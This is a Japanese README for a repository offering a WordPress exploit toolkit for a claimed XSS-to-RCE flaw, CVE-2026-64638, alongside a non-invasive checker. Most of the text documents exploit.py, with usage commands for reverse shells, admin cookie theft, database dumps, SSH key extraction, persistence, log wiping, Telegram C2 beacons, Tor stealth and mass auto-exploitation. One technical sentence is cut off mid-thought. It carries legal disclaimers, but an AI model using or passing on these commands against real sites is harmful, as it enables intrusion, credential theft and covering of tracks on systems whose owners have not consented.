
🛡️ CVE-2026-64638 - WordPress セキュリティ評価スイート (CVSS 8.9) | WordPress 4.7.0-7.0.2 ペンテストツールキット。脆弱性評価と高度な分析モジュールを含みます。🐍 安全なチェックとエクスプロイト、2モード。高度な Blue&Red Team ベスト 2026-64638 ツールキット、許可された使用のみ。合法的に保つ <3zd

⚠️ 倫理的な使用のみ – 許可されたセキュリティテスト
このリポジトリは、許可を得たセキュリティ専門家、ブルーチーム、ペネトレーションテスター のみを対象としたツールを提供します。
コンピュータシステムへの不正アクセスは、CFAA(米国)、Computer Misuse Act(英国)、TCK 243/244(トルコ)、および世界各国の類似法規 により違法です。
CVE‑2026‑64638 は、WordPress コアバージョン 4.7.0 から 7.0.2 における重大な認証前の反射型 XSS 脆弱性であり、攻撃者が Application Password 機能を通じて XSS 攻撃を 完全なリモートコード実行(RCE) に昇格させることを可能にします。
strip_tags() と WordPress の wp_kses_post() は HTML タグの解析方法が異なるため、悪意のある入力がサニタイズを通過する可能性があります。wp-login.php) に注入します。ログイン失敗時に、ペイロードは反射され、被害者のブラウザで実行されます。| ツール | 目的 | 対象ユーザー |
|---|---|---|
exploit.py | リバースシェル、永続化、C2、権限昇格、メモリフォレンジックス、データベースダンプ、SSH キー抽出、マススキャンを備えた完全なエクスプロイトツールキット。 | レッドチーム / 許可を得たペネトレーションテスター |
safecheck.py | 悪意のあるペイロードを実行せずに XSS 反射を検出し、セキュリティ態勢を評価する非侵襲的な脆弱性チェッカー。詳細なレポートを生成します。 | ブルーチーム / セキュリティ監査人 |
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]
exploit.py のパラメータsafecheck.py のパラメータ| エンドポイント | 目的 |
|---|---|
/wp-login.php | ログインページ – XSS 注入ポイント |
/wp-admin/authorize-application.php | Application Password の生成 |
このソフトウェアは、教育目的および許可されたセキュリティテスト専用 として提供されます。
| 機能 | exploit.py | safecheck.py |
|---|
| 脆弱性検出 | ✅ | ✅ |
| WordPress バージョン検出 | ✅ | ✅ |
| XSS 反射検出 | ✅ | ✅ |
| Application Password 取得 | ✅ | ❌ |
| プラグインアップロード (RCE) | ✅ | ❌ |
| リバースシェル | ✅ | ❌ |
| C2 ビーコン (HTTP/DNS/Telegram) | ✅ | ❌ |
| 権限昇格 | ✅ | ❌ |
| メモリフォレンジックス | ✅ | ❌ |
| データベースダンプ | ✅ | ❌ |
| SSH キー抽出 | ✅ | ❌ |
| 永続化手法 | ✅ | ❌ |
| セキュリティヘッダー監査 | ❌ | ✅ |
| 設定ファイル露出チェック | ❌ | ✅ |
| ディレクトリリスティングチェック | ❌ | ✅ |
| phpinfo 露出チェック | ❌ | ✅ |
| マススキャン | ✅ | ✅ |
| プロキシサポート | ✅ | ✅ |
| Tor サポート | ✅ | ✅ |
| Ngrok トンネリング | ✅ | ❌ |
| 対話型シェル | ✅ | ❌ |
| 非侵襲 (セーフ) モード | ❌ | ✅ |
| JSON / レポート出力 | ✅ | ✅ |
| シナリオ | 推奨ツール |
|---|
| ブルーチーム – WordPress インストールが脆弱かどうかの確認 | safecheck.py |
| セキュリティ監査 – 非侵襲的な脆弱性評価 | safecheck.py |
| レッドチーム – 完全なエクスプロイトを伴う許可されたペネトレーションテスト | exploit.py |
| バグバウンティ – 責任ある開示テスト | safecheck.py |
| マススキャン – 複数のターゲットの脆弱性確認 | exploit.py または safecheck.py |
| インシデントレスポンス – システムが侵害されているかの確認 | safecheck.py |
| 高度なポストエクスプロイテーション – 永続化、C2、フォレンジックス | exploit.py |
| パラメータ | 説明 |
|---|
-t, --target | ターゲットの WordPress URL(例: https://wordpress-site.com) |
-l, --list | マススキャン用のターゲットリストを含むファイル(1行に1つ) |
--lhost | リバースシェルコールバック用のローカル IP アドレス |
--lport | リバースシェル用のローカルポート(デフォルト: 4444) |
--proxy | HTTP/HTTPS プロキシ(例: http://127.0.0.1:8080) |
--timeout | リクエストタイムアウト(秒)(デフォルト: 10) |
--retry | リトライ回数(デフォルト: 3) |
--threads | マススキャンのスレッド数(デフォルト: 5) |
--exploit | マススキャン中に脆弱なターゲットを自動エクスプロイト |
--ngrok-token | 外部トンネリング用の Ngrok 認証トークン |
--payload-type | XSS ペイロードタイプ: reflected、dom_based、waf_bypass、case_manipulation、double_encoded |
--session-hijack | セッションハイジャックを有効化(管理者 Cookie を窃取) |
--dump-db | WordPress データベースをダンプ(pymysql が必要) |
--extract-ssh | ターゲットシステムから SSH キーを抽出 |
--tor | Tor(socks5h://127.0.0.1:9050)を経由してトラフィックをルーティング |
--stealth | ステルスモードを有効化(ヘッダーの偽装、リクエストの遅延) |
--no-cleanup | エクスプロイト後のログクリーンアップをスキップ |
--ssl-verify | SSL 証明書を検証 |
--c2-type | C2 タイプ: http、dns、telegram |
--c2-server | C2 サーバー URL または Telegram ボットトークン |
--auto-priv-esc | シェル取得後の自動権限昇格 |
--memory-forensics | メモリフォレンジックスモジュールを有効化 |
-v, --verbose | 詳細出力 |
-q, --quiet | クワイエットモード(最小出力) |
| パラメータ | 説明 |
|---|
-t, --target | ターゲットの WordPress URL(例: https://wordpress-site.com) |
-l, --list | マススキャン用のターゲットリストを含むファイル(1行に1つ) |
--timeout | リクエストタイムアウト(秒)(デフォルト: 10) |
--retry | リトライ回数(デフォルト: 3) |
--threads | マススキャンのスレッド数(デフォルト: 5) |
--proxy | HTTP/HTTPS プロキシ(例: http://127.0.0.1:8080) |
--tor | Tor(socks5h://127.0.0.1:9050)を経由してトラフィックをルーティング |
--ssl-verify | SSL 証明書を検証 |
--output | JSON レポートファイルを出力 |
-v, --verbose | 詳細出力 |
-q, --quiet | クワイエットモード(最小出力) |
| # | シナリオ | コマンド |
|---|
| 1 | クイック脆弱性チェック | python safecheck.py -t https://wordpress-site.com |
| 2 | レポート付き詳細スキャン | python safecheck.py -t https://wordpress-site.com --output report.json -v |
| 3 | リバースシェルによる完全なエクスプロイト | python exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit |
| 4 | カスタム XSS ペイロードを使用 | python exploit.py -t https://wordpress-site.com --payload-type waf_bypass |
| 5 | セッションハイジャック (管理者 Cookie を窃取) | python exploit.py -t https://wordpress-site.com --session-hijack |
| 6 | WordPress データベースのダンプ | python exploit.py -t https://wordpress-site.com --dump-db |
| 7 | SSH キーの抽出 | python exploit.py -t https://wordpress-site.com --extract-ssh |
| 8 | 匿名性のために Tor を使用 | python exploit.py -t https://wordpress-site.com --tor --stealth |
| 9 | Telegram による C2 ビーコン | python exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id" |
| 10 | ファイルからのマススキャン | python exploit.py -l targets.txt --threads 10 --exploit |
| 11 | シェル取得後のメモリフォレンジックス | python exploit.py -t https://wordpress-site.com --memory-forensics |
| 12 | 自動権限昇格 | python exploit.py -t https://wordpress-site.com --auto-priv-esc |
| 13 | 対話型シェル | python exploit.py -t https://wordpress-site.com -i |
| 14 | Ngrok トンネリング | python exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN |
| コマンド | 説明 |
|---|
reverse | リバースシェルリスナーを起動 |
persist | 永続化手法を適用 (cron, systemd, rc.local, SSH, WP) |
clean | システムログと履歴をクリーンアップ |
dumpdb | WordPress データベースをダンプ |
ssh | SSH キーを抽出 |
priv | 自動権限昇格 |
mem | メモリフォレンジックスを実行 |
c2 | C2 ステータスを表示 |
c2task | C2 タスクを確認 |
exit | 対話型シェルを終了 |
/wp-admin/update.php?action=upload-plugin | プラグインアップロード (RCE) |
/wp-content/plugins/{slug}/{slug}.php | ウェブシェル実行 |
| 国 | 関連法規 |
|---|
| 米国 | Computer Fraud and Abuse Act (CFAA) – 18 U.S.C. § 1030 |
| 英国 | Computer Misuse Act 1990 |
| トルコ | TCK 243 (不正アクセス), TCK 244 (システム妨害) |
| ドイツ | StGB § 202a (データスパイ), § 202b (データ傍受) |
| フランス | Loi Godfrain – 第323-1条 |
| オーストラリア | Cybercrime Act 2001 |
| カナダ | Criminal Code – 第342.1条 |
| インド | Information Technology Act 2000 – 第43条、第66条 |
| 日本 | 不正アクセス禁止法 |